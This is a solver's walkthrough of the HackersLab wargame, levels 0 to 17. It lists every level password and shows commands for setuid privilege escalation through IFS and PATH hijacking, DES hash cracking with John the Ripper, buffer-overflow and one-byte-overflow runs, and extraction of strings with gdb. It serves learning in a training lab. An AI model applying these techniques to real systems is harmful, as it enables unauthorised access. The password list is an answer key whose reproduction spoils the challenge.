Mr/ Mrs xxxxxxxxx your current level is 17 The date you achieved your level was 2002-08-18 05:05:01 You sure are a guru! ################################################################################ ..::''''::.. .:::. .;'' ``;. .... ::::: :: :: :: :: ,;' .;: () ..: `:::' :: :: :: :: ::. ..:,:;.,:;. . :: .::::. `:' :: .:' :: :: `:. :: '''::, :: :: :: `:: :: ;: .:: : :: : : :: ,:'; ::; :: :: :: :: :: ::,::''. . :: `:. .:' :: `:,,,,;;' ,;; ,;;, ;;, ,;;, ,;;, `:,,,,:' :;: `;..``::::''..;' ``::,,,,::'' password : access granted ################################################################################ level0: guest level1: newworld level2: DoItYourself level3: hackerproof level4: AreUReady? level5: Silent night,holy night! level6: Best of The Best Hackerslab level7: Cant help falling in love level8: wonderful level9: !secu! level10: Beauty and Beast level11: Permission denied level12: I want to love forever level13: chl1296rh level14: To the top level15: fly to the moon level16: berserker level17: qkfkaehfdl ################################################################################ *LEVEL0* -------------------------------------------------------------------------------- -rwsr-x--- 1 level1 level0 13500 Mar 12 15:38 /dev/.hi -------------------------------------------------------------------------------- [level0@drill level0]$ find /dev -user level1 -group level0 /dev/.hi [level0@drill level0]$ /dev/.hi [level0@drill level0]$ whoami level1 [level0@drill level0]$ pass -------------------------------------------------------------------------------- newworld -------------------------------------------------------------------------------- *LEVEL1* -------------------------------------------------------------------------------- -rwsr-x--- 1 level2 level1 13987 Jul 5 2001 /usr/bin/amos -------------------------------------------------------------------------------- [level1@drill level1]$ find /usr -user level2 -group level1 2>/dev/null /usr/bin/amos [level1@drill level1]$ /usr/bin/amos path? /tmp | pass -------------------------------------------------------------------------------- DoItYourself -------------------------------------------------------------------------------- *LEVEL2* -------------------------------------------------------------------------------- -rwsr-x--- 1 level3 level2 13469 Jul 5 2001 /usr/bin/alert -rwxrwxrwx 1 level3 level2 435 Jul 5 2001 /usr/bin/alert.txt -------------------------------------------------------------------------------- [level2@drill level2]$ /usr/bin/alert ################################################################################ type '!pass' ################################################################################ hackerproof -------------------------------------------------------------------------------- *LEVEL3* -------------------------------------------------------------------------------- -rws--x--- 1 level4 level3 13781 Jul 5 2001 /usr/man/pt_BR/man8/today -------------------------------------------------------------------------------- [level3@drill level3]$ IFS=/ [level3@drill level3]$ export IFS [level3@drill level3]$ /usr/man/pt_BR/man8/today sh: bin: command not found [level3@drill level3]$ cd tmp [level3@drill tmp]$ echo "/bin/pass" > bin [level3@drill tmp]$ chmod +x bin [level3@drill tmp]$ PATH=./ [level3@drill tmp]$ /usr/man/pt_BR/man8/today -------------------------------------------------------------------------------- AreUReady? -------------------------------------------------------------------------------- *LEVEL4* -------------------------------------------------------------------------------- Kevin likes playing games in Linux. One day, he was bored and had nothing to do so he decided to play with a source file of the game. He opened the source file and added some codes and then compiled it. Get the password for the next level by using this program. HINT: Apparently, he added only one line into the source. -------------------------------------------------------------------------------- -rwsr-x--- 1 level5 level4 31416 Jul 11 2001 /usr/games/trojka -------------------------------------------------------------------------------- [level4@drill level4]$ cd tmp [level4@drill tmp]$ echo /bin/pass > clear [level4@drill tmp]$ chmod +x clear [level4@drill tmp]$ PATH=./ [level4@drill tmp]$ /usr/games/trojka -------------------------------------------------------------------------------- Silent night,holy night! -------------------------------------------------------------------------------- *LEVEL5* -------------------------------------------------------------------------------- A hacker named John made the backdoor for the first problem. He got really angry when he realized that other HackersLab members were taking his backdoor for granted. He had worked on it very hard for one day and now he thinks that he can feel rest assured thinking that no one else can use the backdoor. Drive him mad again! -------------------------------------------------------------------------------- -rwsr-x--- 1 level6 level5 14306 Jul 10 2001 /lib/security/pam_auth.so -------------------------------------------------------------------------------- [level5@drill level5]$ strings /lib/security/pam_auth.so /lib/ld-linux.so.2 __gmon_start__ libc.so.6 printf execl __cxa_finalize getpass sleep __deregister_frame_info strcmp _IO_stdin_used __libc_start_main __register_frame_info GLIBC_2.1.3 GLIBC_2.0 PTRh QVh, what the hell are you thinking? abcd1234 1qaz2wsx 0plmfk3s qkqh fj3,n34k$^ fgjk3!mfr* Best of The Best Hackerslab -------------------------------------------------------------------------------- *LEVEL6* -------------------------------------------------------------------------------- On behalf of all those who have worked hard to reach this level, we have opened a port for you so that you could get the password easily. ButKoopsKI don't remember the port number. SorryK -------------------------------------------------------------------------------- [level6@drill level6]$ netstat -ta | grep LISTEN Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:qc *:* LISTEN tcp 0 0 *:www *:* LISTEN tcp 0 0 *:auth *:* LISTEN tcp 0 0 *:ssh *:* LISTEN tcp 0 0 *:telnet *:* LISTEN tcp 0 0 *:smtp *:* LISTEN tcp 0 0 *:pspd *:* LISTEN [level6@drill level6]$ grep pspd /etc/services pspd 6969/tcp #level7 problem port -------------------------------------------------------------------------------- bash-2.05$ telnet drill.hackerslab.org 6969 Trying 203.239.110.20... Connected to drill.hackerslab.org. Escape character is '^]'. -------------------------------------------------------------------------------- bla-bla-bla... -------------------------------------------------------------------------------- level6's passwd: 'Best of The Best Hackerslab' Congratulation!! level7's passwd is 'Cant help falling in love' Connection closed by foreign host. -------------------------------------------------------------------------------- *LEVEL7* -------------------------------------------------------------------------------- There is an executable file somewhere that holds the password for the next level. Unfortunately, it isn't easy to find. You have to figure it out by yourself this time. -------------------------------------------------------------------------------- -rwx--x--- 1 level8 level7 12878 Jul 5 2001 /dev/audio2 -------------------------------------------------------------------------------- [level7@drill level7]$ /dev/audio2 VoE4HoQCFfMW2 shadow level8 н κ̴. -------------------------------------------------------------------------------- level8:VoE4HoQCFfMW2 -------------------------------------------------------------------------------- [xxxxxxxxx@lppri john-1.6]$ run/john -wordfile:wordlists/cracklib.txt level8.txt Loaded 1 password (Standard DES [24/32 4K]) wonderfu (level8) guesses: 1 time: 0:00:00:25 100% c/s: 30382 trying: wonderdo - woodbine -------------------------------------------------------------------------------- wonderful -------------------------------------------------------------------------------- *LEVEL8* -------------------------------------------------------------------------------- This problem requires a good understanding of hacking techniques. Use the technique to the /usr/bin/ps2 , which was implemented by the famous 8lgm hackers club, in order to get the password to the next level. HINT: A temporary file will be created in var/tmp2. -------------------------------------------------------------------------------- -rws--x--- 1 level9 level8 15739 Jul 5 2001 /usr/bin/ps2 lrwxrwxrwx 1 root level8 10 Jul 31 2001 /var/tmp2 -> /tmp/tmp2/ -rw-rw-r-- 1 level9 level8 0 Apr 15 15:02 /tmp/tmp2/ps2.tmp -------------------------------------------------------------------------------- [level8@drill tmp]$ ./level8_exploit.sh level9 Password is !secu! -------------------------------------------------------------------------------- *LEVEL9* -------------------------------------------------------------------------------- What happens when you forget to perform `bound checking`? HINT: /etc/bof -------------------------------------------------------------------------------- -rws--x--- 1 level10 level9 13577 Jul 10 2001 /etc/bof -------------------------------------------------------------------------------- [level9@drill level9]$ /etc/bof `perl -e '{print "A"x"75"}'` hello~ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA [level9@drill level9]$ /etc/bof `perl -e '{print "A"x"76"}'` hello~ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAA Segmentation fault -------------------------------------------------------------------------------- [level9@drill tmp]$ ./level9_exploit 80 28 return address: 0xbffffac0 hello~ ^1FF V ͐1ې@͐/bin/sh bash$ whoami level10 bash$ pass -------------------------------------------------------------------------------- Beauty and Beast -------------------------------------------------------------------------------- *LEVEL10* -------------------------------------------------------------------------------- A daemon in the Free Hacking Zone uses the UDP5555 port. This daemon is waiting for the packets to arrive from the www.hackerslab.org host. The packets include the email address of the recipient as well as the password for level 10. The daemon will notify the password for the next level via email as soon as it receives the packets from www.hackerslab.org.The format is as follows:`The password of level 10` / `email address`.Example: If the password for level 10 is `abcd` and the email address is `abc@aaa.ccc.ddd.rr`, then the message in the packet is abcd/abc@aaa.ccc.ddd.rr*Remember to send the packet from www.hackerslab.org. -------------------------------------------------------------------------------- [level10@drill level10]$ grep 5555/udp /etc/services usd 5555/udp #level11 udp spoofing..port -------------------------------------------------------------------------------- Permission denied -------------------------------------------------------------------------------- *LEVEL11* -------------------------------------------------------------------------------- You can find the /usr/local/bin/passwd.fail file by running the /usr/local/bin/hof program. However, we want the /usr/local/bin/passwd.success file which includes the password for the next level. Go get it!HINT: Use the `heap` area. -------------------------------------------------------------------------------- -rws--x--- 1 level12 level11 14705 Jul 10 2001 /usr/local/bin/hof -rwxr-xr-x 1 level12 level12 17 Jul 5 2001 /usr/local/bin/passwd.fail -rwx------ 1 level12 level12 34 Jul 5 2001 /usr/local/bin/passwd.success -------------------------------------------------------------------------------- [level11@drill tmp]$ ./level11_exploit 365 level11's Password : view_file = usr/local/bin/passwd.success error opening usr/local/bin/passwd.success: No such file or directory [level11@drill tmp]$ ./level11_exploit 364 level11's Password : view_file = /usr/local/bin/passwd.success н : I want to love forever -------------------------------------------------------------------------------- *LEVEL12* -------------------------------------------------------------------------------- Here's the problem for you to solve. Your idol, Jungwoo could capture the communication contents by a sniffer while the administrators of HackersLab were logging in level 13. He thought that he could get the password easily with this but they were communicating secretly by using their own algorithm with the encrypted password `tu|tSI/Z^`. While he was searching the system, he found a tool in /usr/bin/encrypt which they used for coding. Now, this is what you have to do. You can analyze the encryption algorithm by using the tool. Then, break the encryption for the password. -------------------------------------------------------------------------------- -rwxr-x--- 1 level13 level12 13781 Jul 5 2001 /usr/bin/encrypt -------------------------------------------------------------------------------- chl1296rh -------------------------------------------------------------------------------- *LEVEL13* -------------------------------------------------------------------------------- [xxxxxxxxx@mashiina hackerslab]$ ./level13_client Got challenge: query_a = 6965 query_b = 9397 Response = 60 Got challenge: query_a = 7055 query_b = 907 Response = 41 Got challenge: query_a = 4832 query_b = 5462 Response = 83 Password for next level = "To the top" -------------------------------------------------------------------------------- *LEVEL14* -------------------------------------------------------------------------------- You know there is a program that shows you the password for the level you are on, but something has gone wrong ... what is it? -------------------------------------------------------------------------------- ---x--x--- 1 level15 level14 974519 Jul 5 2001 /bin/pass.old -------------------------------------------------------------------------------- [level14@drill level14]$ /bin/pass.old Ϲ ̵ Դϴ. -------------------------------------------------------------------------------- [level14@drill tmp]$ ./level14_so_called_exploit& [1] 11160 [level14@drill tmp]$ gdb level14_so_called_exploit 11160 GNU gdb 19991004 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... /tmp/level14_tmp/11160: No such file or directory. Attaching to program: /tmp/level14_tmp/level14_so_called_exploit, Pid 11160 Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. 0x400a9c41 in __libc_nanosleep () from /lib/libc.so.6 (gdb) c Continuing. Program received signal SIGTRAP, Trace/breakpoint trap. 0x80480f0 in ?? () (gdb) x/s 0x8071bc2 0x8071bc2: "fly to the moon" -------------------------------------------------------------------------------- *LEVEL15* -------------------------------------------------------------------------------- Bangdoll, the most stupid programmer in the Universe has coded a new version of a program he wrote earlier, and again, it has a serious bug! No Wonder! Hint: Use a one-byte overflow -------------------------------------------------------------------------------- -rws--x--- 1 level16 level15 964040 Jul 5 2001 /etc/one -------------------------------------------------------------------------------- [level15@drill level15]$ /etc/one xxxxxxxxx HELLO~~ xxxxxxxxx [level15@drill level15]$ /etc/one `perl -e '{print "A"x"32"}'` HELLO~~ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA**˃ [level15@drill level15]$ /etc/one `perl -e '{print "A"x"33"}'` HELLO~~ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA))˃ Segmentation fault [level15@drill level15]$ /etc/one `perl -e '{print "A"x"34"}'` your name is too long!! -------------------------------------------------------------------------------- [level15@drill tmp]$ ./level15_exploit 38 Using address: 0xbffffad8 [level15@drill level15_tmp]$ /etc/one $RET HELLO~~ ?? bash$ pass -------------------------------------------------------------------------------- berserker -------------------------------------------------------------------------------- *LEVEL16* -------------------------------------------------------------------------------- You can solve this problem by using format string. -------------------------------------------------------------------------------- -rws--x--- 1 level17 level16 963025 Jul 5 2001 /usr/local/bin/format -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- qkfkaehfdl --------------------------------------------------------------------------------